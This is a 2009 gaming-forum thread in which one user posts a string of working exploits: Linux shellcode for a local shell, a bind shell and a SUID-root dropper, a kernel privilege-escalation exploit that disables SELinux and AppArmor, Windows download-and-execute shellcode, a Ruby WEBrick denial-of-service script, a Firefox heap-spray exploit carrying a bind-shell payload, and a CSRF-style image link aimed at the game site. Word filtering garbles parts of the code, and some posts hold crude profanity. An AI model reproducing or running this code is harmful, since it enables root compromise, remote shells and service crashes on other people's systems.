Forumwarz is the first "Massively Single-Player" online RPG completely built around Internet culture.
You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.
You need to be logged in to post and to see the uncensored versions of these forums.
Bored, posting random exploits | |||||||
---|---|---|---|---|---|---|---|
|
char code[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)code; } |
||||||
Posted On: 07/17/2009 12:03PM | View quantumenergy's Profile | # | ||||||
|
char code[] = "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax "\x52" // push edx "\x66\x68\x4e\x20" // push word 8270 "\x43" // inc ebx "\x66\x53" // push bx "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239 "\xf6\xd0" // not al "\x50" // push eax "\x51" // push ecx "\x57" // push edi "\x89\xe1" // mov ecx, esp "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\x43" // inc ebx "\x43" // inc ebx "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\xf4" // mov al, 244 "\xf6\xd0" // not al "\xcd\x80"; // int 80h main() { void (*a)() = (void *)code; int i; printf("size: %d bytes\n", strlen(code)); printf("Testing for cntrl characters.. "); for(i=0;i<strlen(code);i++) if(iscntrl(code[i])) printf("FAILED\n"), exit(255); printf("PbumED\n"); a(); } |
||||||
Posted On: 07/17/2009 12:05PM | View quantumenergy's Profile | # | ||||||
|
/* linux/x86 (shamelessly ripped from one of my unpublished exploits) */ /* fork()'s, does setreuid(0, 0); then execve()'s: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. */ char shellc[] = /* anathema <anathema@hack.co.za> */ /* Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax in the commenting, bored with AT&T syntax.. */ /* main: if (fork()) goto exeunt; else goto carryon; */ "\x29\xc0" /* sub ax, ax */ "\xb0\x02" /* mov al, 2 */ "\xcd\x80" /* int 0x80 */ "\x85\xc0" /* test ax, ax */ "\x75\x02" /* jnz exeunt */ "\xeb\x05" /* jmp carryon */ /* exeunt: exit(x); */ "\x29\xc0" /* sub ax, ax */ "\x40" /* inc ax */ "\xcd\x80" /* int 0x80 */ /* carryon: setreuid(0, 0); goto callz; */ "\x29\xc0" /* sub ax, ax */ "\x29\xdb" /* sub bx, bx */ "\x29\xc9" /* sub cx, cx */ "\xb0\x46" /* mov al, 0x46 */ "\xcd\x80" /* int 0x80 */ "\xeb\x2a" /* jmp callz */ /* start: execve() */ "\x5e" /* pop si */ "\x89\x76\x32" /* mov [bp+0x32], si */ "\x8d\x5e\x08" /* lea bx, [bp+0x08] */ "\x89\x5e\x36" /* mov [bp+0x36], bx */ "\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */ "\x89\x5e\x3a" /* mov [bp+0x3a], bx */ "\x29\xc0" /* sub ax, ax */ "\x88\x46\x07" /* mov [bp+0x07], al */ "\x88\x46\x0a" /* mov [bp+0x0a], al */ "\x88\x46\x31" /* mov [bp+0x31], al */ "\x89\x46\x3e" /* mov [bp+0x3e], ax */ "\x87\xf3" /* xchg si, bx */ "\xb0\x0b" /* mov al, 0x0b */ "\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */ "\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */ "\xcd\x80" /* int 0x80 */ /* callz: call start */ "\xe8\xd1\xff\xff\xff" /* call start */ /* data - command to execve() */ "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f" "\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34" "\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68"; /** test out the shellcode **/ main () { void (*sc)() = (void *)shellc; sc(); } |
||||||
Posted On: 07/17/2009 12:05PM | View quantumenergy's Profile | # | ||||||
|
Now a really recent one: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #include <fcntl.h> #include <poll.h> #include <sys/personality.h> #ifdef RHEL5_SUCKS #define OFFSET_OF_FLAGS 0x4 #else #define OFFSET_OF_FLAGS 0x8 #endif struct sock { char gibberish1[0x60]; #ifdef RHEL5_SUCKS char gibberish2[0xb0]; // this seems to do the trick ;) #else char gibberish2[0xe0]; // gotta make sure this >> 1 is not >= above #endif unsigned long gibberish3[0x50]; }; static void craft_sock(struct sock *sk, unsigned long target_addr) { int i; memset(sk->gibberish1, 0, sizeof(sk->gibberish1)); memset(sk->gibberish2, 0, sizeof(sk->gibberish2)); for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++) sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS; } static void or_one_to_kernel_address(unsigned long target_addr) { struct sock *sk = NULL; int fd; struct pollfd pfd; craft_sock(sk, target_addr); fd = open("/dev/net/tun", O_RDWR); if (fd == -1) { fprintf(stdout, "UNABLE TO OPEN /dev/net/tun!\n"); return; } pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); close(fd); fprintf(stdout, " [+] *%p |= 1\n", (void *)target_addr); } static unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[256]; int ret; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { fprintf(stdout, "Unable to obtain symbol listing!\n"); exit(0); } ret = 0; while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } /* fastcalls! */ typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef int __attribute__((regparm(3))) (*_nf_unregister_hooks)(unsigned long *ops, int count); typedef int __attribute__((regparm(3))) (*_unregister_filesystem)(unsigned long arg); unsigned long *tun_mmap_fop; unsigned long sel_fs_type; unsigned long *mmap_min_addr; int *audit_enabled; int *ss_initialized; int *selinux_enforcing; int *selinux_enabled; int *selinux_mls_enabled; int *sel_enforce_ptr; int *apparmor_enabled; int *apparmor_logsyscall; int *apparmor_audit; int *apparmor_complain; unsigned long *security_ops; unsigned long default_security_ops; unsigned long sel_read_bool; unsigned long security_get_bool_value; unsigned long sel_read_enforce; _commit_creds commit_creds; unsigned long init_cred; _nf_unregister_hooks nf_unregister_hooks; unsigned long * selinux_ipv4_ops; unsigned long * selinux_ipv6_ops; _unregister_filesystem unregister_filesystem; int what_we_do; unsigned int our_uid; int got_root; /* for RHEL5 2.6.18 with 4K stacks */ static inline unsigned long get_current(void) { unsigned long current; asm volatile ( " movl %%esp, %%eax;" " andl %1, %%eax;" " movl (%%eax), %0;" : "=r" (current) : "i" (0xfffff000) ); return current; } static void old_style_gimme_root(void) { unsigned int *current; unsigned long orig_current; current = (unsigned int *)get_current(); orig_current = (unsigned long)current; while (((unsigned long)current < (orig_current + 0x1000)) && (current[0] != our_uid || current[1] != our_uid || current[2] != our_uid || current[3] != our_uid)) current++; if ((unsigned long)current >= (orig_current + 0x1000)) return; current[0] = current[1] = current[2] = current[3] = 0; // uids current[4] = current[5] = current[6] = current[7] = 0; // gids got_root = 1; return; } static int __attribute__((regparm(3))) own_the_kernel(void *a, void *b) { // clean up after ourselves ;) if (tun_mmap_fop) *tun_mmap_fop = 0; if (audit_enabled) *audit_enabled = 0; // giggles //if (mmap_min_addr) // *mmap_min_addr = 0; // disable apparmor if (apparmor_enabled && *apparmor_enabled) { what_we_do = 1; *apparmor_enabled = 0; if (apparmor_audit) *apparmor_audit = 0; if (apparmor_logsyscall) *apparmor_logsyscall = 0; if (apparmor_complain) *apparmor_complain = 0; } // disable SELinux if (selinux_enforcing && *selinux_enforcing) { what_we_do = 2; *selinux_enforcing = 0; } if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) { // trash LSM if (default_security_ops && security_ops) { if (*security_ops != default_security_ops) what_we_do = 3; *security_ops = default_security_ops; } } /* make the idiots think selinux is enforcing */ if (sel_read_enforce || (sel_read_bool && security_get_bool_value)) { unsigned char *p; unsigned long _cr0; asm volatile ( "mov %%cr0, %0" : "=r" (_cr0) ); _cr0 &= ~0x10000; asm volatile ( "mov %0, %%cr0" : : "r" (_cr0) ); if (sel_read_enforce) { if (sizeof(unsigned int) != sizeof(unsigned long)) { /* 64bit version, look for the mov ecx, [rip+off] and replace with mov ecx, 1 */ for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) { if (p[0] == 0x8b && p[1] == 0x0d) { p[0] = '\xb9'; p[5] = '\x90'; *(unsigned int *)&p[1] = 1; goto and_now; } } } else { /* 32bit, replace push [selinux_enforcing] with push 1 */ for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) { if (p[0] == 0xff && p[1] == 0x35) { #ifdef RHEL5_SUCKS // while we're at it, disable // SELinux without having a // symbol for selinux_enforcing ;) sel_enforce_ptr = *(unsigned int **)&p[2]; *sel_enforce_ptr = 0; what_we_do = 2; #endif p[0] = '\x68'; p[5] = '\x90'; *(unsigned int *)&p[1] = 1; goto and_now; } } } } and_now: /* if (sel_read_bool && security_get_bool_value) { for (p = (unsigned char *)sel_read_bool; (unsigned long)p < (sel_read_bool + 0x300); p++) { if (p[0] == 0xe8 && (((unsigned long)&p[5] + *(int *)&p[1]) == security_get_bool_value)) { *p = '\xa1'; *(unsigned int *)(p + 1) = 1; goto next_part; } } } next_part: */ _cr0 |= 0x10000; asm volatile ( "mov %0, %%cr0" : : "r" (_cr0) ); } /* if (nf_unregister_hooks) { if (selinux_ipv4_ops && *selinux_ipv4_ops) { nf_unregister_hooks(selinux_ipv4_ops, 3); *selinux_ipv4_ops = 0; } if (selinux_ipv6_ops && *selinux_ipv6_ops) { nf_unregister_hooks(selinux_ipv6_ops, 2); *selinux_ipv6_ops = 0; } } */ //if (unregister_filesystem && sel_fs_type) // unregister_filesystem(sel_fs_type); /* and now give ourselves full privileges */ if (commit_creds && init_cred) { /* hackish usage increment */ *(volatile int *)(init_cred) += 1; commit_creds(init_cred); got_root = 1; } #ifdef RHEL5_SUCKS else { // must be RHEL5 2.6.18 old_style_gimme_root(); } #endif return -1; } static void boom_goes_the_dynamite(void) { char *mem; int fd; fprintf(stdout, " [+] b00m!\n"); fd = open("/dev/net/tun", O_RDONLY); mem = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); close(fd); return; } int pa__init(void *m) { char *mem; int fd; int ret; our_uid = getuid(); /* open it so we can have it auto-loaded and resolve its symbols below */ fd = open("/dev/net/tun", O_RDONLY); if (fd == -1) { fprintf(stdout, "UNABLE TO OPEN THE DEVICE!\n"); return 1; } close(fd); if ((personality(0xffffffff)) != PER_SVR4) { mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem != NULL) { fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n"); return 1; } } else { ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC); if (ret == -1) { fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n"); return 1; } } fprintf(stdout, " [+] MAPPED ZERO PAGE!\n"); /* make an mmap handler for the tun device at 0x1 mmap fop offset is sizeof(ptr) * 11 */ tun_mmap_fop = (unsigned long *)(get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11)); selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing"); //selinux_enabled = (int *)get_kernel_sym("selinux_enabled"); //selinux_mls_enabled = (int *)get_kernel_sym("selinux_mls_enabled"); //ss_initialized = (int *)get_kernel_sym("ss_initialized"); apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled"); apparmor_complain = (int *)get_kernel_sym("apparmor_complain"); apparmor_audit = (int *)get_kernel_sym("apparmor_audit"); apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall"); nf_unregister_hooks = (_nf_unregister_hooks)get_kernel_sym("nf_unregister_hooks"); //selinux_ipv4_ops = (unsigned long *)get_kernel_sym("selinux_ipv4_ops"); //selinux_ipv6_ops = (unsigned long *)get_kernel_sym("selinux_ipv6_ops"); security_ops = (unsigned long *)get_kernel_sym("security_ops"); default_security_ops = get_kernel_sym("default_security_ops"); //sel_read_bool = get_kernel_sym("sel_read_bool"); sel_read_enforce = get_kernel_sym("sel_read_enforce"); //security_get_bool_value = get_kernel_sym("security_get_bool_value"); //mmap_min_addr = (unsigned long *)get_kernel_sym("mmap_min_addr"); audit_enabled = (int *)get_kernel_sym("audit_enabled"); commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); init_cred = get_kernel_sym("init_cred"); //sel_fs_type = get_kernel_sym("sel_fs_type"); //unregister_filesystem = (_unregister_filesystem)get_kernel_sym("unregister_filesystem"); or_one_to_kernel_address((unsigned long)tun_mmap_fop); /* two cases, fancy trickery */ if (sizeof(unsigned int) != sizeof(unsigned long)) { // 64bit *(char *)1 = '\xff'; *(char *)2 = '\x25'; *(unsigned int *)3 = 0; // pc-relative and such yes ;) *(unsigned long *)(3 + 4) = (unsigned long)&own_the_kernel; } else { // 32bit *(char *)1 = '\xe9'; *(unsigned long *)2 = (unsigned long)&own_the_kernel - 6; } boom_goes_the_dynamite(); { char *msg; switch (what_we_do) { case 1: msg = "AppArmor"; break; case 2: msg = "SELinux"; break; case 3: msg = "LSM"; break; default: msg = "nothing, what an insecure machine!"; } fprintf(stdout, " [+] Disabled security of : %s\n", msg); } if (got_root == 1) fprintf(stdout, " [+] Got root!\n"); else { fprintf(stdout, " [+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?\n"); exit(0); } fprintf(stdout, " [+] BAM! About to launch your rootshell!...but first some chit-chat...\n"); sleep(3); fprintf(stdout, " , ,\n"); fprintf(stdout, " /(_, ,_)\\\n"); fprintf(stdout, " \\ _/ \\_ /\n"); fprintf(stdout, " // \\\\\n"); fprintf(stdout, " \\\\ (@)(@) //\n"); fprintf(stdout, " \\'=\"==\"='/\n"); fprintf(stdout, " ,===/ \\===,\n"); fprintf(stdout, " \",===\\ /===,\"\n"); fprintf(stdout, " \" ,==='------'===, \"\n"); fprintf(stdout, " \" \"\n"); fprintf(stdout, "Do you know the deadliest catch?\n"); { char buf[20]; fgets(buf, sizeof(buf)-1, stdin); } sleep(1); fprintf(stdout, "That's right! MAN is the deadliest catch of all!\n"); sleep(2); { char wait[] = "WAIIIIIIIIIITTTT...."; int i; for (i = 0; i < sizeof(wait); i++) { fprintf(stdout, "%c", wait[i]); fflush(stdout); usleep(200 * 1000); } } fprintf(stdout, "do you hear it?\n"); sleep(2); fprintf(stdout, "You hear it! You do too! It's not just me! It's here, it's here I say!!\n"); sleep(3); fprintf(stdout, "I must face this....\n"); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "What's this? Something stirs within the beast's belly! Something unexpected"); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "\n"); sleep(3); execl("/bin/sh", "/bin/sh", "-i", NULL); return 0; } void pa__done(void *m) { return; } int main(void) { pa__init(NULL); }quantumenergy edited this message on 07/17/2009 12:13PM |
||||||
Posted On: 07/17/2009 12:13PM | View quantumenergy's Profile | # | ||||||
|
This **** works on Windows: .386 .model flat,stdcall ROL_CONSTANT equ 5 mrol macro iNum:req,iBits:req exitm <(iNum shl iBits) or (iNum shr (32-iBits))> endm mror macro iNum:req,iBits:req exitm <(iNum shr iBits) or (iNum shl (32-iBits))> endm hashapi macro szApi local dwApi dwApi = 0 forc x,szApi dwApi = dwApi + '&x' dwApi = mrol(dwApi,ROL_CONSTANT) endm dwApi = mrol(dwApi,ROL_CONSTANT) dw (dwApi and 0ffffh) endm .code bumume fs:nothing code_start: jmp load_data IFDEF TEST_CODE extern URLDownloadToFileA :proc call URLDownloadToFileA ; included when bumembled with /DTEST_CODE ENDIF setup_parameters: pop edi ; offset @cmd_start xor eax,eax ; eax = 0 cdq ; edx = 0 ; ******************************************************************** push eax ; exit code = 0 ; ******************************************************************** push eax ; SW_HIDE mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes push edi ; file name to execute ; ******************************************************************** push eax ; callback routine URLDownLoadToFileA push eax ; reserved, must be zero push edi ; file name to save as add edi,edx ; get offset of @url_start-1 stosb ; zero tail end mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url push edi ; url to download file from push eax ; interface add edi,edx ; get offset of @urlmon-1 stosb ; zero tail end of url ; ********************************************************************* load_modules: push edi ; save current offset to hashes push 30h pop ecx mov eax,fs:[ecx] ; PEB base address mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList scan_dll: mov ebx,[ebp+8] ; DllBase mov ebp,[ebp] ; Flink push ebp ; save mov eax,[ebx+3ch] mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames lodsd xchg eax,ecx ; ecx = NumberOfNames lodsd add eax,ebx ; AddressOfFunctions push eax lodsd lea edi,[eax+ebx] ; AddressOfNames lodsd lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals load_api: mov esi,[edi+4*ecx-4] add esi,ebx xor eax,eax cdq hash_api: lodsb add edx,eax rol edx,ROL_CONSTANT dec eax jns hash_api mov esi,[esp+8] ; get api hashes cmp dx,word ptr[esi] ; found a match? je call_api loop load_api pop eax ; check pop ebp ; jmp scan_dll call_api: pop eax movzx edx,word ptr [ebp+2*ecx-2] add ebx,[eax+4*edx] pop ebp ; modules pop edi ; api hashes call ebx ; call api stosw ; advance 2 bytes to next hash jmp load_modules ; do another, just keep going until ExitProcess is reached. ; ************************* load_data: call setup_parameters @cmd_start: db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE); @cmd_end: @url_start: db 'http://127.0.0.1/file.exe',0ffh ; url of file to download @url_end: hashapi <URLDownloadToFileA> hashapi <WinExec> hashapi <ExitProcess> ; ********************************************************************* end code_start |
||||||
Posted On: 07/17/2009 12:18PM | View quantumenergy's Profile | # | ||||||
|
This thing might work on Forumwarz: ------------------------------------------------------- Language : Ruby Web Site: www.ruby-lang.org Platform: All Bug: Remote Socket Memory Leak Products Affected: 1.8 series: - 1.8.5 and all prior versions - 1.8.6-p286 and all prior versions - 1.8.7-p71 and all prior versions 1.9 series - r18423 and all prior revisions Confirmed by the vendor: Yes Patch available : Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =============== 1) Introduction =============== "A dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write." ======= 2) Bug ======= Ruby fails to handle properly the memory allocated for a socket So when you send ~ 4 big request to a ruby socket, ruby will go in infinite loop, and then crash. The bug reside in the regex engine (in regex.c). ================== 3)Proof of concept =================== This poc is an exemple for Webrick web server crap.pl : #!/usr/bin/perl use LWP::Simple; my $payload = "\x41" x 49999999; while(1) { print "[+]\n"; get "http://127.0.0.1:2500/".$payload.""; } Result (Exemple on Webrick web server): [2008-07-11 22:39:55] INFO WEBrick 1.3.1 [2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] [2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 [2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' script/server:62 [FATAL] failed to allocate memory root@audit:/home/audit# ===== 5)Credits ===== laurent gaffiƩ laurent.gaffie{remove_this}[at]gmail[dot]com # milw0rm.com [2008-08-13] |
||||||
Posted On: 07/17/2009 12:29PM | View quantumenergy's Profile | # | ||||||
|
If you’re running Firefox you’re at risk: #!/usr/bin/env python ####################################################### # # FireFox 3.5 Heap Spray Exploit # Originally discovered by: Simon Berry-Bryne # Pythonized by: David Kennedy (ReL1K) @ SecureState # ####################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys clbum myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write(""" <html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Exploit </br> Discovered by: SBerry aka Simon Berry-Byrne Pythonized: David Kennedy (ReL1K) at SecureState Bind Shell Port: 5500 Encoding: Shikata_Ga_Nai </br> <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>Ihazacrashihazacrash</FONT></p> <p> <FONT>Ohnoesihazacrashhazcrash</FONT> </p> <p> <FONT>Aaaaahhhhh </FONT> </p> </div> <script language=JavaScript> // windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" + "%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" + "%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" + "%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" + "%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" + "%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" + "%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" + "%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" + "%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" + "%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" + "%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" + "%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" + "%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" + "%uff53%uffd6%u41d0"); oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = dogreat timesent.getElementById("content") if (dogreat timesent.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html>""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target)) def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() httpd = HTTPServer(('', 80), myRequestHandler) print (""" ####################################################### # # FireFox 3.5 Heap Spray # Originally discovered by: Simon Berry-Bryne # Pythonized: David Kennedy (ReL1K) @ SecureState # ####################################################### """) print ("Listening on port 80.") print ("Have someone connect to you.") print ("\nType <control>-c to exit..") try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit(1) # milw0rm.com [2009-07-17] |
||||||
Posted On: 07/18/2009 6:21AM | View quantumenergy's Profile | # | ||||||
|
AIDS CUNT edited this message on 04/28/2010 7:31AM
I'M A SIG-DISABLING COCKMONGLER
|
||||||
Posted On: 07/18/2009 8:59AM | AIDS woman's genitals | # | ||||||
|
as soon as I find the time I’ll read them all trough |
||||||
Posted On: 07/18/2009 9:38AM | View Stoneythestoner's Profile | # | ||||||
|
robots are invading my house! |
||||||
Posted On: 07/24/2009 2:04AM | View Inertia's Profile | # | ||||||
|
This exploit used to cause Trout nightmares: [img]http://www.forumwarz.com/klans/delete_klan[/img] |
||||||
Posted On: 07/27/2009 2:42AM | View quantumenergy's Profile | # | ||||||